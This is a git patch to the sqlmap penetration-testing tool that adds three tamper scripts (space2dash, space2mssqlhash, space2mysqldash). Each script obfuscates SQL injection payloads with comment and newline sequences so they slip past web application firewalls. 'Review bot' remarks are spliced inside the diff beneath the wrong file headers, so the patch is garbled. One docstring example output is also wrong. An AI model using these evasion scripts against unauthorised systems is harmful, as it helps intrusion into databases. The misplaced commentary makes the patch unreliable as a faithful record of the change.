From 5f08b90b6c9c6b41827fc3e7a37cb44c8acb84f0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 3 Nov 2011 16:04:34 +0000 Subject: [PATCH] commiting new tampering scripts contributed by Roberto Salgado --- doc/THANKS | 2 +- tamper/space2dash.py | 54 +++++++++++++++++++++++++++++++++++++++ tamper/space2mssqlhash.py | 47 ++++++++++++++++++++++++++++++++++ tamper/space2mysqldash.py | 52 +++++++++++++++++++++++++++++++++++++ 4 files changed, 154 insertions(+), 1 deletion(-) create mode 100644 tamper/space2dash.py create mode 100644 tamper/space2mssqlhash.py create mode 100644 tamper/space2mysqldash.py diff --git a/doc/THANKS b/doc/THANKS index a85d03d0e..f952efb48 100644 --- a/doc/THANKS +++ b/doc/THANKS @@ -436,7 +436,7 @@ Tomoyuki Sakurai for submitting to the FreeBSD project the sqlmap 0.5 port Roberto Salgado - for contributing several tamper scripts + for contributing considerable amount of tamper scripts Pedro Jacques Santos Santiago for reporting considerable amount of bugs diff --git a/tamper/space2dash.py b/tamper/space2dash.py new file mode 100644 index 000000000..5464a1eca --- /dev/null +++ b/tamper/space2dash.py 
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import random
+import string
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload):
+ """
+ Replaces space character (' ') with a dash comment ('--') followed by
+ a random string and a new line ('\n')
+
+ Example:
+ * Input: 1 AND 9227=9227
+ * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
+
+ Requirement:
+ * MSSQL
+ * SQLite
+
+ Tested against:
+
+ Notes:
+ * Useful to bypass several web application firewalls
+ * Used during the ZeroNights SQL injection challenge,
+ https://proton.onsec.ru/contest/
+ """
+
+ retVal = ""
+
+ if payload:
+ for i in xrange(len(payload)):
+ if payload[i].isspace():
+ randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
+ retVal += "--%s%%0A" % randomStr
+ elif payload[i] == '#' or payload[i:i+3] == '-- ':
+ retVal += payload[i:]
+ break
+ else:
+ retVal += payload[i]
+
+ return retVal
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
new file mode 100644
index 000000000..a0917f3a5
--- /dev/null
+++ b/tamper/space2mssqlhash.py
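Review bot: The comment short-circuit `elif payload[i] == '#' or payload[i:i+3] == '-- ':` stops rewriting at the first `#`, yet the docstring targets MSSQL and SQLite, neither of which treats `#` as a comment introducer as far as I can tell, so a payload that legitimately contains `#` (a T-SQL temporary table name, for instance) would have the rest of its spaces left untouched. The script also imports `os`, `singleTimeWarnMessage` and `DBMS` but never defines `dependencies()`, so unlike space2mysqldash.py in the same commit it emits no warning when run against an unsupported backend. I would add `def dependencies():` / `    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))`, or otherwise drop the three unused imports. The empty `Tested against:` section should either name a version this was verified on or be removed.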
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload):
+ """
+ Replaces space character (' ') with a pound character ('#') followed by
+ a new line ('\n')
+
+ Example:
+ * Input: 1 AND 9227=9227
+ * Output: 1%23%0A9227=9227
+
+ Requirement:
+ * MSSQL
+ * MySQL
+
+ Notes:
+ * Useful to bypass several web application firewalls
+ """
+
+ retVal = ""
+
+ if payload:
+ for i in xrange(len(payload)):
+ if payload[i].isspace():
+ retVal += "%23%0A"
+ elif payload[i] == '#' or payload[i:i+3] == '-- ':
+ retVal += payload[i:]
+ break
+ else:
+ retVal += payload[i]
+
+ return retVal
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
new file mode 100644
index 000000000..cd13aeb7c
--- /dev/null
+++ b/tamper/space2mysqldash.py
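Review bot: The docstring example does not match the code beneath it: every whitespace character is replaced by `%23%0A` and all other characters are copied, so input `1 AND 9227=9227` yields `1%23%0AAND%23%0A9227=9227`, not the `1%23%0A9227=9227` shown on the `* Output:` line, and I would correct that line to `* Output: 1%23%0AAND%23%0A9227=9227`. As in the sibling scripts, `os`, `singleTimeWarnMessage` and `DBMS` are imported but no `dependencies()` is defined, so nothing warns when the script is used outside the MSSQL/MySQL requirement; either add the warning the way space2mysqldash.py does or remove the unused imports. A `Tested against:` section naming the versions this was actually verified on would also help, since `#` as a comment introducer is MySQL rather than T-SQL syntax as far as I can tell, and the MSSQL claim is otherwise unsupported in the file.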
@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
+
+def tamper(payload):
+ """
+ Replaces space character (' ') with a dash comment ('--') followed by
+ a new line ('\n')
+
+ Example:
+ * Input: 1 AND 9227=9227
+ * Output: 1--%0AAND--%0A9227=9227
+
+ Requirement:
+ * MySQL
+ * MSSQL
+
+ Tested against:
+
+ Notes:
+ * Useful to bypass several web application firewalls.
+ """
+
+ retVal = ""
+
+ if payload:
+ for i in xrange(len(payload)):
+ if payload[i].isspace():
+ retVal += "--%0A"
+ elif payload[i] == '#' or payload[i:i+3] == '-- ':
+ retVal += payload[i:]
+ break
+ else:
+ retVal += payload[i]
+
+ return retVal
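Review bot: `dependencies()` warns that the script is only meant for `DBMS.MYSQL`, while the docstring directly below lists both MySQL and MSSQL under `Requirement:`; one of the two is wrong, and as written a user gets a warning on a backend the docstring says is supported. Either drop `* MSSQL` from the docstring or widen the message to `singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s and %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL, DBMS.MSSQL))`. The empty `Tested against:` section should name a version or be removed. The replacement `retVal += "--%0A"` relies on MySQL's `--` comment form requiring whitespace after the second dash, which the encoded newline supplies, and that is worth a one-line comment: `# MySQL's "--" comment needs trailing whitespace; the encoded newline provides it`.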